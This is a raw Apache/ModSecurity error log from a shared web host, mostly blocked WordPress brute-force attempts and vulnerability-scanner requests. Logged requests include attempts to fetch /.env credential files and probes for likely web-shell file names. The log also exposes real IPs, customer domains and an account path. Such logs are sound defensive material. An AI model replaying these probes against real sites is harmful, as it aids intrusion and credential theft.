[Tue May 26 14:21:01.091907 2026] [security2:error] [pid 606909:tid 607062] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe9F0yRtX9qA7aVUVPRgAAAJw"]
[Tue May 26 14:21:02.107608 2026] [security2:error] [pid 606909:tid 607148] [client 4.201.75.230:5464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/themes.php"] [unique_id "ahVe9l0yRtX9qA7aVUVPeAAAAPI"]
[Tue May 26 14:21:03.073896 2026] [security2:error] [pid 606909:tid 607047] [client 85.11.167.19:46548] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVe910yRtX9qA7aVUVPngAAAI0"]
[Tue May 26 14:21:03.202502 2026] [security2:error] [pid 606909:tid 607078] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe9l0yRtX9qA7aVUVPiwAAAKw"]
[Tue May 26 14:21:04.052719 2026] [security2:error] [pid 606909:tid 607165] [client 85.11.167.19:46550] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "gestionbar.azurmediatec.com"] [uri "/"] [unique_id "ahVe-F0yRtX9qA7aVUVPtQAAAQM"]
[Tue May 26 14:21:04.500140 2026] [security2:error] [pid 606909:tid 607150] [client 202.141.30.10:35366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe-F0yRtX9qA7aVUVPuQAAAPQ"]
[Tue May 26 14:21:04.500328 2026] [security2:error] [pid 606909:tid 607150] [client 202.141.30.10:35366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVe-F0yRtX9qA7aVUVPuQAAAPQ"]
[Tue May 26 14:21:04.612847 2026] [core:crit] [pid 606909:tid 607086] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:21:05.173050 2026] [security2:error] [pid 606909:tid 607089] [client 202.141.83.254:53774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe-V0yRtX9qA7aVUVPzAAAALc"]
[Tue May 26 14:21:05.173741 2026] [security2:error] [pid 606909:tid 607089] [client 202.141.83.254:53774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVe-V0yRtX9qA7aVUVPzAAAALc"]
[Tue May 26 14:21:05.712471 2026] [security2:error] [pid 606909:tid 607081] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe-V0yRtX9qA7aVUVP0gAAAK8"]
[Tue May 26 14:21:05.756727 2026] [security2:error] [pid 606909:tid 607098] [client 4.201.75.230:5459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/an.php"] [unique_id "ahVe-V0yRtX9qA7aVUVP3QAAAMA"]
[Tue May 26 14:21:06.774015 2026] [security2:error] [pid 606909:tid 607144] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe-l0yRtX9qA7aVUVP6AAAAO4"]
[Tue May 26 14:21:08.866493 2026] [security2:error] [pid 606909:tid 607075] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe_F0yRtX9qA7aVUVQFgAAAKk"]
[Tue May 26 14:21:09.358838 2026] [core:crit] [pid 606909:tid 607160] (13)Permission denied: [client 52.167.144.210:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:21:10.448017 2026] [security2:error] [pid 606909:tid 607126] [client 74.7.230.47:40000] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "senoro.com.mx"] [uri "/cgi-sys/404.html"] [unique_id "ahVe_l0yRtX9qA7aVUVQQAAA3Ew"]
[Tue May 26 14:21:11.451739 2026] [security2:error] [pid 606909:tid 607050] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVe_10yRtX9qA7aVUVQWQAAAJA"]
[Tue May 26 14:21:13.589843 2026] [security2:error] [pid 606909:tid 607141] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfAV0yRtX9qA7aVUVQiAAAAOs"]
[Tue May 26 14:21:14.751164 2026] [security2:error] [pid 606909:tid 607045] [client 4.201.75.230:5448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/index/function.php"] [unique_id "ahVfAl0yRtX9qA7aVUVQuQAAAIs"]
[Tue May 26 14:21:15.326547 2026] [security2:error] [pid 606909:tid 607089] [client 202.141.30.10:35512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfA10yRtX9qA7aVUVQzAAAALc"]
[Tue May 26 14:21:15.326677 2026] [security2:error] [pid 606909:tid 607089] [client 202.141.30.10:35512] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfA10yRtX9qA7aVUVQzAAAALc"]
[Tue May 26 14:21:15.605130 2026] [security2:error] [pid 606909:tid 607131] [client 202.141.83.254:19855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfA10yRtX9qA7aVUVQ0QAAAOE"]
[Tue May 26 14:21:15.605549 2026] [security2:error] [pid 606909:tid 607131] [client 202.141.83.254:19855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfA10yRtX9qA7aVUVQ0QAAAOE"]
[Tue May 26 14:21:15.659390 2026] [security2:error] [pid 606909:tid 607102] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfA10yRtX9qA7aVUVQyQAAAMQ"]
[Tue May 26 14:21:16.867082 2026] [security2:error] [pid 606909:tid 607132] [client 68.183.190.139:64927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 139.190.183.68.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "server.dezka.mx"] [uri "/news/wp-login.php"] [unique_id "ahVfBF0yRtX9qA7aVUVQ3AAAAOI"]
[Tue May 26 14:21:17.481982 2026] [security2:error] [pid 606909:tid 607122] [client 37.156.188.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfBV0yRtX9qA7aVUVQ5AAAANg"]
[Tue May 26 14:21:17.788333 2026] [security2:error] [pid 606909:tid 607069] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfBV0yRtX9qA7aVUVQ7gAAAKM"]
[Tue May 26 14:21:20.001772 2026] [security2:error] [pid 606909:tid 607062] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfB10yRtX9qA7aVUVRKAAAAJw"]
[Tue May 26 14:21:21.788370 2026] [security2:error] [pid 606909:tid 607118] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfCV0yRtX9qA7aVUVRVgAAANQ"]
[Tue May 26 14:21:24.025587 2026] [security2:error] [pid 606909:tid 607098] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfC10yRtX9qA7aVUVRnwAAAMA"]
[Tue May 26 14:21:25.247340 2026] [security2:error] [pid 606909:tid 607107] [client 4.201.75.230:5445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/ws.php"] [unique_id "ahVfDV0yRtX9qA7aVUVR2AAAAMk"]
[Tue May 26 14:21:25.897164 2026] [security2:error] [pid 606909:tid 607039] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfDV0yRtX9qA7aVUVR3gAAAIU"]
[Tue May 26 14:21:26.140227 2026] [security2:error] [pid 606909:tid 607050] [client 4.201.75.230:5454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/404.php"] [unique_id "ahVfDl0yRtX9qA7aVUVR6QAAAJA"]
[Tue May 26 14:21:26.140560 2026] [security2:error] [pid 606909:tid 607162] [client 202.141.83.254:5866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfDV0yRtX9qA7aVUVR6AAAAQA"]
[Tue May 26 14:21:26.140722 2026] [security2:error] [pid 606909:tid 607162] [client 202.141.83.254:5866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfDV0yRtX9qA7aVUVR6AAAAQA"]
[Tue May 26 14:21:26.330130 2026] [security2:error] [pid 606909:tid 607055] [client 202.141.30.10:35346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfDl0yRtX9qA7aVUVR8gAAAJU"]
[Tue May 26 14:21:26.330265 2026] [security2:error] [pid 606909:tid 607055] [client 202.141.30.10:35346] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfDl0yRtX9qA7aVUVR8gAAAJU"]
[Tue May 26 14:21:26.462663 2026] [security2:error] [pid 606909:tid 607023] [remote 74.7.241.58:57560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVfDl0yRtX9qA7aVUVR9wAA33E"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:21:27.472451 2026] [security2:error] [pid 606909:tid 607101] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfD10yRtX9qA7aVUVSAwAAAMM"]
[Tue May 26 14:21:29.821990 2026] [security2:error] [pid 606909:tid 607088] [client 4.201.75.230:5442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVfEV0yRtX9qA7aVUVSUgAAALY"]
[Tue May 26 14:21:30.184421 2026] [security2:error] [pid 606909:tid 607135] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfEV0yRtX9qA7aVUVSTQAAAOU"]
[Tue May 26 14:21:31.270118 2026] [security2:error] [pid 606909:tid 607029] [remote 46.62.185.67:49890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahVfE10yRtX9qA7aVUVSdQAA83c"]
[Tue May 26 14:21:32.051079 2026] [security2:error] [pid 606909:tid 607060] [client 4.201.75.230:5443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp-conf.php"] [unique_id "ahVfFF0yRtX9qA7aVUVSkQAAAJo"]
[Tue May 26 14:21:32.299277 2026] [security2:error] [pid 606909:tid 607074] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfE10yRtX9qA7aVUVSigAAAKg"]
[Tue May 26 14:21:34.332995 2026] [security2:error] [pid 606909:tid 607067] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfFV0yRtX9qA7aVUVSzgAAAKE"]
[Tue May 26 14:21:34.675514 2026] [proxy:error] [pid 606909:tid 607099] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:21:34.675590 2026] [proxy_http:error] [pid 606909:tid 607099] [client 198.235.24.24:61768] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:21:34.676180 2026] [proxy:error] [pid 606909:tid 607099] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:21:34.676211 2026] [proxy_http:error] [pid 606909:tid 607099] [client 198.235.24.24:61768] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:21:36.218442 2026] [security2:error] [pid 606909:tid 607157] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfF10yRtX9qA7aVUVS9wAAAPs"]
[Tue May 26 14:21:36.414156 2026] [security2:error] [pid 606909:tid 607123] [client 202.141.83.254:53901] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfGF0yRtX9qA7aVUVTBAAAANk"]
[Tue May 26 14:21:36.414289 2026] [security2:error] [pid 606909:tid 607123] [client 202.141.83.254:53901] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfGF0yRtX9qA7aVUVTBAAAANk"]
[Tue May 26 14:21:37.227206 2026] [security2:error] [pid 606909:tid 607163] [client 202.141.30.10:65324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfGV0yRtX9qA7aVUVTFAAAAQE"]
[Tue May 26 14:21:37.227349 2026] [security2:error] [pid 606909:tid 607163] [client 202.141.30.10:65324] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfGV0yRtX9qA7aVUVTFAAAAQE"]
[Tue May 26 14:21:37.820099 2026] [security2:error] [pid 606909:tid 607079] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfGV0yRtX9qA7aVUVTGgAAAK0"]
[Tue May 26 14:21:39.230199 2026] [security2:error] [pid 606909:tid 607051] [client 4.201.75.230:5447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVfGl0yRtX9qA7aVUVTRwAAAJE"]
[Tue May 26 14:21:39.303984 2026] [security2:error] [pid 606909:tid 606970] [remote 148.251.232.195:60335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.232.251.148.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVfG10yRtX9qA7aVUVTSwAAiTw"]
[Tue May 26 14:21:39.865816 2026] [security2:error] [pid 606909:tid 607091] [client 146.174.160.115:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfG10yRtX9qA7aVUVTWAAAALk"]
[Tue May 26 14:21:40.428046 2026] [security2:error] [pid 606909:tid 607056] [client 4.201.75.230:5450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/abc.php"] [unique_id "ahVfHF0yRtX9qA7aVUVTegAAAJY"]
[Tue May 26 14:21:40.433318 2026] [security2:error] [pid 606909:tid 607070] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfHF0yRtX9qA7aVUVTbAAAAKQ"]
[Tue May 26 14:21:40.442899 2026] [security2:error] [pid 606909:tid 607158] [client 172.71.144.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahVfHF0yRtX9qA7aVUVTdgAAAPw"]
[Tue May 26 14:21:41.913454 2026] [security2:error] [pid 606909:tid 607107] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfHV0yRtX9qA7aVUVTogAAAMk"]
[Tue May 26 14:21:44.648189 2026] [security2:error] [pid 606909:tid 607087] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfIF0yRtX9qA7aVUVT4AAAALU"]
[Tue May 26 14:21:46.782846 2026] [security2:error] [pid 606909:tid 607152] [client 202.141.83.254:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfIl0yRtX9qA7aVUVUNgAAAPY"]
[Tue May 26 14:21:46.782973 2026] [security2:error] [pid 606909:tid 607152] [client 202.141.83.254:5638] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfIl0yRtX9qA7aVUVUNgAAAPY"]
[Tue May 26 14:21:46.878424 2026] [security2:error] [pid 606909:tid 607127] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfIl0yRtX9qA7aVUVULQAAAN0"]
[Tue May 26 14:21:48.026489 2026] [security2:error] [pid 606909:tid 607049] [client 202.141.30.10:35433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfJF0yRtX9qA7aVUVUSwAAAI8"]
[Tue May 26 14:21:48.026592 2026] [security2:error] [pid 606909:tid 607049] [client 202.141.30.10:35433] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfJF0yRtX9qA7aVUVUSwAAAI8"]
[Tue May 26 14:21:48.752655 2026] [security2:error] [pid 606909:tid 607056] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfJF0yRtX9qA7aVUVUVAAAAJY"]
